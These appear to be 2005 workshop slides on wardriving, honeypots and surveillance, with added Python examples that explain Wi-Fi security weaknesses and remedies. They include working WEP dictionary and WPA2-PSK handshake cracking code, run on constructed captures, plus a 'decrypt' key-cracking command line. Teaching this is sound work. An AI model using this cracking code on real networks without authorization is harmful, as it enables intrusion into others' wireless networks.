Hacking, Tracking, and Baiting: Surveillance, Wardriving and Honeypot Technologies
Larry Korba, Institute for Information Technology
National Research Council of Canada
PST 2005 Workshop, October 12, 2005
Overview
• Goal
• Wardriving
• Honeypots
• Other Surveillance Techniques
– Surreptitious
– Organization
• Conclusions
GOAL
• Describe some “interesting” technologies related to surveillance
– and what to expect next
• Raise privacy, responsibility, legal questions
Wardriving
• In the News
– Florida man charged with stealing WiFi signal (July 2005)
– How vulnerable is Wi-Fi Authentication? (November 2004)
– Wardriving around town (February 2005)
– Wi-Fi Security Wakes Up to Reality (June 2005)
Wardriving – Background
• Wi-Fi (popularly expanded as “Wireless Fidelity”, although the Wi-Fi Alliance treats it as a brand name rather than an acronym)
– Wireless network communication in the GHz range (2.4 GHz for 802.11b/g, 5 GHz for 802.11a)
– Wireless access points provide a bridge to the Internet
• Problems:
– Network access through thin air: no physical connection is needed, so the perimeter is the radio range, not the building wall
– Wireless networks often configured without any security
– Commonly used Wi-Fi security protocols are broken (WEP outright; WPA-PSK whenever the passphrase is weak)
– Looking for wireless access points is fun!
– Using them is… illegal? Immoral?
Wardriving – Technologies
• Antenna
• Powerful, sensitive Wi-Fi cards
Wardriving – Technologies
• WEP: 40- and 104-bit keys (+ 24-bit initialization vector, sent in the clear = “64-bit”/“128-bit” WEP)
• Poor implementation (2001): the first key-recovery attack (Fluhrer, Mantin and Shamir) needed about 5 million captured packets; it works because the IV is attached in the clear to the RC4 key
• Firmware improvements (vendors stopped using the “weak” IVs), then KoreK 2004: WEP statistical cryptanalysis, about 2 million packets required to break WEP
• WPA Personal (WPA-PSK): weakness found in 2003, tools appeared in 2004 (WPA Cracker, coWPAtty): brute-force and dictionary attacks on the WPA-PSK four-way handshake (works on weak passphrases)
• Aircrack, WepLab, AirSnort, Kismet, decrypt, among others (plus MAC address spoofing to get past MAC filters)
• Example: dictionary attack on a 40-bit WEP key with decrypt
# decrypt -f /usr/dict/words -m 00:02:2D:27:D9:22 -e encrypted.dump -d out.dump
Found key: Hex - 61:6c:6f:68:61, ASCII - "aloha"
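What the decrypt command above actually does, as an added example (this is not the slides' code nor the decrypt tool's source): a 40-bit WEP key is five bytes, so every five-letter dictionary word is tried as the key, the captured frame is decrypted with RC4 under IV||key, and the candidate is accepted when the CRC-32 integrity check value at the end verifies. The second function shows why the 24-bit IV being in the clear matters: two frames under the same IV share a keystream. The encrypted frames, the key “aloha”, the IV and the word list are all constructed here so the example runs offline.

```python
# Added example (not from the slides): what `decrypt -f /usr/dict/words ...`
# does for a 40-bit WEP key, plus the IV-reuse leak that makes the 24-bit IV
# a problem. The encrypted frames are constructed here with key "aloha" so the
# example runs offline; real captures come from a sniffer such as Kismet.
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling + keystream generation, XORed over data (WEP's cipher)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV (3 bytes, in the clear) || key-id byte || RC4(IV||key, data||ICV).
    Only the 40- or 104-bit key is secret; the 24-bit IV is the part everyone sees."""
    assert len(iv) == 3 and len(key) in (5, 13)
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_try_key(key: bytes, body: bytes):
    """Decrypt with a candidate key; return the plaintext if the ICV checks, else None.
    A wrong key yields random bytes, whose CRC matches the trailing 4 bytes with p = 2^-32."""
    iv, ciphertext = body[:3], body[4:]
    dec = rc4(iv + key, ciphertext)
    plaintext, tail = dec[:-4], dec[-4:]
    return plaintext if icv(plaintext) == tail else None


def wep_dictionary_attack(body: bytes, words):
    """Try each 5-character word as an ASCII 40-bit key, the way `decrypt -f /usr/dict/words` does."""
    for word in words:
        key = word.strip().encode()
        if len(key) != 5:            # 40-bit keys are exactly 5 bytes
            continue
        if wep_try_key(key, body) is not None:
            return key
    return None


def iv_reuse_leak(body_a: bytes, body_b: bytes) -> bytes:
    """Two frames with the same IV (visible in the clear) under the same key share an RC4
    keystream, so XORing the ciphertexts cancels it and leaves plaintext_a XOR plaintext_b."""
    assert body_a[:3] == body_b[:3], "different IVs, keystreams differ"
    return bytes(x ^ y for x, y in zip(body_a[4:], body_b[4:]))


# constructed capture: an LLC/SNAP header followed by a made-up payload
SAMPLE_KEY = b"aloha"
SAMPLE_IV = b"\x01\x02\x03"
PLAINTEXT_A = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"constructed IP payload, frame A"
PLAINTEXT_B = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"constructed IP payload, frame B"
FRAME_A = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, PLAINTEXT_A)
FRAME_B = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, PLAINTEXT_B)   # same IV: the 24-bit space wraps fast
WORDLIST = ["hello", "world", "wifi", "aloha", "password"]

if __name__ == "__main__":
    print("Found key:", wep_dictionary_attack(FRAME_A, WORDLIST))
    print("Leak from IV reuse:", iv_reuse_leak(FRAME_A, FRAME_B))
```

The dictionary attack only works when the key was typed as words; the 2001 and 2004 attacks on the slide recover any key from the traffic itself, which is why a “strong” WEP key is not a remedy.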
Wardriving: Results?
• Coverage maps
Wardriving – Remedies
• Security enabled: WEP or WPA (choose a strong key and change it regularly)
– Caveat: the WEP attacks above are statistical and recover any key, strong or not; only WPA-PSK benefits from a strong passphrase, so prefer WPA wherever the hardware supports it
• Ensure the admin password is set (not left at the factory default)
• Enable MAC address authentication
– Caveat: MAC filtering raises the bar only slightly; client MACs travel in the clear and the tools above spoof them
• Use VPN access
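Why “choose a strong key” is the remedy that matters for WPA-PSK: the four-way handshake attack on the earlier slide is an offline dictionary search, shown here as an added example (not code from the slides, and not coWPAtty's source). The station's EAPOL message 2 carries a MIC computed with a key derived from the passphrase and SSID, so each guess costs one PBKDF2 run plus a few HMACs and is checked against the captured MIC. The SSID, MAC addresses, nonces, the weak passphrase and the EAPOL frame are all constructed here; the AP MAC reused from the slide is just a placeholder, and the MIC algorithm assumed is WPA2's HMAC-SHA1 (WPA1/TKIP uses HMAC-MD5).

```python
# Added example (not from the slides): the offline dictionary attack that
# coWPAtty / Aircrack run against a captured WPA2-PSK four-way handshake.
# The "capture" (SSID, MAC addresses, nonces, EAPOL message 2) is constructed
# here so the example runs offline; the passphrase is deliberately weak.
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL-Key MIC field: 4-byte 802.1X header + 77 bytes of key descriptor


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the step that costs the attacker ~4096 HMACs per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def wpa_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 16 bytes of PTK = PRF-512(PMK, "Pairwise key expansion",
    min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce)): the key
    confirmation key that authenticates the handshake MICs."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return wpa_prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP MIC: HMAC-SHA1 over the EAPOL-Key frame with its MIC field zeroed, first 16 bytes.
    Assumption: key descriptor version 2 (WPA2); WPA1/TKIP would use HMAC-MD5 here."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP) with no key data."""
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: MIC set, pairwise, HMAC-SHA1 version
            + b"\x00\x10"               # key length
            + (1).to_bytes(8, "big")    # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, RSC, key ID (unused in msg 2)
            + mic
            + b"\x00\x00")              # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, EAPOL-Key


def crack_psk(ssid, aa, spa, anonce, snonce, eapol_msg2, words):
    """Try each candidate passphrase until the recomputed MIC matches the captured one."""
    captured = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in words:
        word = word.strip()
        if not 8 <= len(word) <= 63:    # WPA-PSK passphrases are 8 to 63 characters
            continue
        kck = wpa_kck(wpa_pmk(word, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2), captured):
            return word
    return None


# constructed handshake capture
SSID = "linksys"
AA = bytes.fromhex("00022d27d922")        # AP MAC (placeholder: the address from the slide)
SPA = bytes.fromhex("000c41aabbcc")       # station MAC (made up)
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
SECRET_PASSPHRASE = "sunshine1"           # what the victim chose
_kck = wpa_kck(wpa_pmk(SECRET_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
CAPTURED_MSG2 = build_eapol_msg2(SNONCE, eapol_mic(_kck, build_eapol_msg2(SNONCE)))
WORDLIST = ["password", "letmein1", "sunshine", "sunshine1", "linksys123"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_psk(SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2, WORDLIST))
```

Two things follow for the remedy. The PBKDF2 step is salted with the SSID, so precomputed tables only help against common default SSIDs such as “linksys”; renaming the network defeats them. And nothing in the protocol limits the guess rate, so the only defence is a passphrase that is not in any dictionary.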
Wardriving – Other Remedies
• Conventional
– RADIUS server (802.1X / WPA Enterprise: per-user credentials instead of one shared key)
– Security audit: wireless AP detection, WEP/WPA strength testing, coverage mapping
• Others
– Antenna design
– Shielding: windows, walls; paint? (Forcefieldwireless.com)
• Future
– Better AP configuration (secure out of the box)
– Intel range determination: 1’ over 231’
– Mapping wireless as an alternative to GPS (Microsoft)
– WPA2 improvements?
• Responsibility? Laws? Morality?
Honeypots
• News Items…
– ‘Honeymonkeys’ find web threats
– Skype Honeypot snares dirty IMers
– New Gatesweeper firewall collects information about attackers
– Cops tempt crook with technology
– Avoiding Sticky Legal Traps: Hackers have rights too! How can you deploy honeypots without running afoul of the law.
– Wi-Fi ‘WarTrappers’ nab drive-by hackers
Honeypots – Background
• Definition/Description/Origin
– “An Evening with Berferd: In Which a Cracker is Lured, Endured, and Studied”, Bill Cheswick, 1991 (published at USENIX, 1992)
– Any system resource whose value lies in being probed, attacked, or compromised; in unauthorized or illicit use of that resource
– Don’t solve a particular problem, but contribute to the security architecture
• Not for prevention: a honeypot detects and records, it does not block
• Ineffective against automated attacks (a worm is recorded, not stopped)
– Provide early warning, prediction
– Discover new tools/tactics
– Track behavior patterns
– Develop forensic analysis skills
– Low- and high-interaction types (emulated services with little risk, versus real systems that yield more data but can be turned against you)
Honeypots – Application
• Capture low-hanging fruit
• Network configurations
• Emulation
• OS with bugs
• Open ports…
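A low-interaction honeypot in the sense of the list above (an open port, an emulated service, a record of who knocked), as an added example that is not part of the slides and not any named honeypot product. It binds a listener on a port the OS picks, answers every connection with a fake SSH banner, records the source address and the first bytes sent, and tags the attempt by what the visitor seemed to expect. The banner, the classification rules and the probe payload are this example's own assumptions; the loopback address keeps it runnable offline.

```python
# Added example (not from the slides): a minimal low-interaction honeypot.
# It listens on an "open port", emulates a service banner, and records every
# connection attempt and the first bytes the visitor sends. Banner and probe
# payload are constructed for this example; the port is chosen by the OS.
import datetime
import socket
import threading

FAKE_BANNER = b"SSH-2.0-OpenSSH_4.1\r\n"  # assumption: pose as an old SSH daemon


class LowInteractionHoneypot:
    """Accepts TCP connections, sends a fake banner, logs what the peer sends."""

    def __init__(self, host="127.0.0.1", port=0, banner=FAKE_BANNER):
        self.banner = banner
        self.events = []                 # one dict per connection attempt
        self._lock = threading.Lock()
        self._stop = threading.Event()
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind((host, port))
        self._sock.listen(5)
        self._sock.settimeout(0.2)       # so the accept loop can notice stop()
        self.port = self._sock.getsockname()[1]
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self.port

    def stop(self):
        self._stop.set()
        self._thread.join()              # every accepted connection is fully logged by now
        self._sock.close()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, addr = self._sock.accept()
            except socket.timeout:
                continue
            self._handle(conn, addr)

    def _handle(self, conn, addr):
        conn.settimeout(1.0)
        payload = b""
        try:
            conn.sendall(self.banner)    # emulation: look like a real service
            payload = conn.recv(1024)    # capture the visitor's first move
        except OSError:
            pass
        finally:
            conn.close()
        event = {
            "time": datetime.datetime.now(datetime.timezone.utc).isoformat(),
            "src_ip": addr[0],
            "src_port": addr[1],
            "payload_hex": payload.hex(),
            "kind": classify(payload),
        }
        with self._lock:
            self.events.append(event)


def classify(payload: bytes) -> str:
    """Rough tag for the recorded payload. Any hit on a honeypot is suspect;
    this only says what the visitor seems to have expected on the port."""
    if not payload:
        return "connect-only"            # port scan or banner grab
    if payload.startswith(b"SSH-"):
        return "ssh-client"              # a real SSH client (or brute-forcer) spoke back
    if payload.split(b" ")[0] in (b"GET", b"POST", b"HEAD"):
        return "http-probe"              # web scanner hitting every open port
    return "unknown"


def probe(port: int, payload: bytes, host="127.0.0.1") -> bytes:
    """The visitor side: connect, send a probe, return whatever banner came back."""
    with socket.create_connection((host, port), timeout=2) as s:
        s.sendall(payload)
        return s.recv(1024)


if __name__ == "__main__":
    hp = LowInteractionHoneypot()
    port = hp.start()
    print("banner seen by visitor:", probe(port, b"GET / HTTP/1.0\r\n\r\n"))
    hp.stop()
    for event in hp.events:
        print(event)
```

Because the service is emulated, there is nothing for the visitor to compromise, which is the low-interaction trade-off: safe to run, but the record stops at the first exchange. A high-interaction honeypot, such as the bugged OS listed above, would let the intruder continue and would need the containment and the legal review the rest of this section raises.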
Honeypots – Spin-offs/Future
• Further Honeypot/Honeynet development
– Integrated, proactive 0-day security response
– GHH: Google Hack Honeypot
• Honeymonkey
– Web spider (client) running unpatched Windows XP
– Gathers malicious code hosted by web servers
• Technology “traps”
– Automobiles (black box and bait)
Other Surveillance Techniques
• Keystroke monitoring: historical and present day (surreptitious screen shots, keystroke logging)
• Trojans, rootkits, backdoors via web and email
• Email monitoring
– Metalincs
– Smarsh
– SpectorSoft
• Instant Messaging
– IMbrella
– Global Relay
• File usage
• Network monitoring
• Government surveillance
• Google!
• Legal issues remain!
The Bottom Line
• Surreptitious monitoring and network access
– There are many ways; there will be more
• Who is responsible? What is the law?
– Privacy protection?
– Is there a “reasonable expectation of privacy” in network-related activities?
– Entrapment?
• Do possible network intruders have rights?
– If you operate an open wireless access point, are you offering a service?
– Jurisdictional issues